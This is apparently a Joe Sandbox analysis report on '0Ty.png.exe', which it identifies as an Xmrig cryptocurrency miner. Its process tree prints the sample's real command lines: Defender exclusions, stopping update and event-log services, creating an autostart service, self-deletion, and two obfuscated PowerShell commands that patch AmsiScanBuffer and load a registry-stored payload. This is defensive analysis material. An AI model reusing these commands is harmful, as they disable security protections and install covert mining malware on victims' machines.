Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0Ty.png.exe

Overview

General Information

Sample name:0Ty.png.exe
Analysis ID:1580691
MD5:3cae1f11044d2ca787824610a40f1696
SHA1:bf4af642f36e87b887f973f47a46bcb2e656c636
SHA256:50ae56d020d35a747bdf32acbd7c9cc23f8a6827d19c5f32bb05d068acf47251
Tags:exeuser-Jame
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 0Ty.png.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\0Ty.png.exe" MD5: 3CAE1F11044D2CA787824610A40F1696)
    • powershell.exe (PID: 7428 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7740 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7664 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7756 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7808 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7856 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7904 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7952 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7960 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7976 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7992 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 8008 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • sc.exe (PID: 8048 cmdline: C:\Windows\system32\sc.exe delete "HGLZSDMZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8176 cmdline: C:\Windows\system32\sc.exe create "HGLZSDMZ" binpath= "C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3704 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5356 cmdline: C:\Windows\system32\sc.exe start "HGLZSDMZ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4076 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\0Ty.png.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7312 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
    • dllhost.exe (PID: 8008 cmdline: C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • dllhost.exe (PID: 3228 cmdline: C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
          • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 8168 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CKtjhrwjgtVV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OBERloAcZJvOcu,[Parameter(Position=1)][Type]$NRdDEuXiTK)$iAHAMhduySN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'mor'+[Char](121)+''+[Char](77)+''+'o'+'dul'+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+'p'+'e'+'',''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+'c,'+[Char](83)+'e'+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+'nsiC'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+'Cla'+'s'+''+'s'+'',[MulticastDelegate]);$iAHAMhduySN.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$OBERloAcZJvOcu).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'ged');$iAHAMhduySN.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+[Char](108)+'',$NRdDEuXiTK,$OBERloAcZJvOcu).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+'anag'+'e'+''+'d'+'');Write-Output $iAHAMhduySN.CreateType();}$qragMIYqXnsdW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+'te'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'os'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+''+'i'+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+'ho'+[Char](100)+''+'s'+'');$OvDFGAtJneNnnn=$qragMIYqXnsdW.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'ta'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JUWLrRiAryQvoCLvYRG=CKtjhrwjgtVV @([String])([IntPtr]);$QPnZYyCGLlinWBcTXIFRjN=CKtjhrwjgtVV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nOTpineWwNN=$qragMIYqXnsdW.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'H'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+''+'e'+''+[Char](108)+'32'+'.'+''+[Char](100)+''+[Char](108)+'l')));$GwiYeAsQvQLFBf=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$nOTpineWwNN,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$crErzkRECYPPqZhPE=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$nOTpineWwNN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$XcrjNVu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GwiYeAsQvQLFBf,$JUWLrRiAryQvoCLvYRG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$GgrwIxrHHMksBSkCM=$OvDFGAtJneNnnn.Invoke($Null,@([Object]$XcrjNVu,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+''+[Char](110)+''+'B'+'u'+'f'+'f'+'e'+''+[Char](114)+'')));$mtiMskcCMz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($crErzkRECYPPqZhPE,$QPnZYyCGLlinWBcTXIFRjN).Invoke($GgrwIxrHHMksBSkCM,[uint32]8,4,[ref]$mtiMskcCMz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GgrwIxrHHMksBSkCM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($crErzkRECYPPqZhPE,$QPnZYyCGLlinWBcTXIFRjN).Invoke($GgrwIxrHHMksBSkCM,[uint32]8,0x20,[ref]$mtiMskcCMz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • weiuemyrzjra.exe (PID: 4280 cmdline: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exe MD5: 3CAE1F11044D2CA787824610A40F1696)
    • powershell.exe (PID: 2308 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7648 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7708 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7556 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7700 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7656 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7800 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7812 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7860 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7896 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7884 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7916 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7936 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 8136 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 8052 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • powershell.exe (PID: 7956 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DwpcGqRaxEQb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kwrQxTwRDzvgHI,[Parameter(Position=1)][Type]$doUOZqbWki)$ZycFOOCRuuH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+'ga'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'lass',[MulticastDelegate]);$ZycFOOCRuuH.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+'e'+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+'m'+[Char](101)+','+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$ZycFOOCRuuH.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'Sig'+','+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$doUOZqbWki,$kwrQxTwRDzvgHI).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $ZycFOOCRuuH.CreateType();}$PIBnzpATGOiSb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+'d'+'l'+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+'.'+'Uns'+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+'s');$BXLsZikXLBwiCU=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+'Ad'+[Char](100)+'res'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,St'+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PODdpwJbLVAeqmqHxFL=DwpcGqRaxEQb @([String])([IntPtr]);$yBpeaDKUEGooqcDLMYJxLn=DwpcGqRaxEQb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ckLkUNcHalt=$PIBnzpATGOiSb.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dll')));$gtTuUeciWixJxL=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+'Li'+[Char](98)+'r'+[Char](97)+'ryA')));$XRPINnzEnujTAspan=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$ckLkUNcHalt,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+'t'+'')));$DBzwtCM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gtTuUeciWixJxL,$PODdpwJbLVAeqmqHxFL).Invoke(''+[Char](97)+''+[Char](109)+'si'+'.'+''+[Char](100)+'ll');$DyCMYouZARyvvTbwm=$BXLsZikXLBwiCU.Invoke($Null,@([Object]$DBzwtCM,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+'a'+'n'+'B'+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$GgVQgYCQUN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,4,[ref]$GgVQgYCQUN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DyCMYouZARyvvTbwm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XRPINnzEnujTAspan,$yBpeaDKUEGooqcDLMYJxLn).Invoke($DyCMYouZARyvvTbwm,[uint32]8,0x20,[ref]$GgVQgYCQUN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+'a'+''+'l'+''+'e'+''+'r'+''+[Char](115)+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
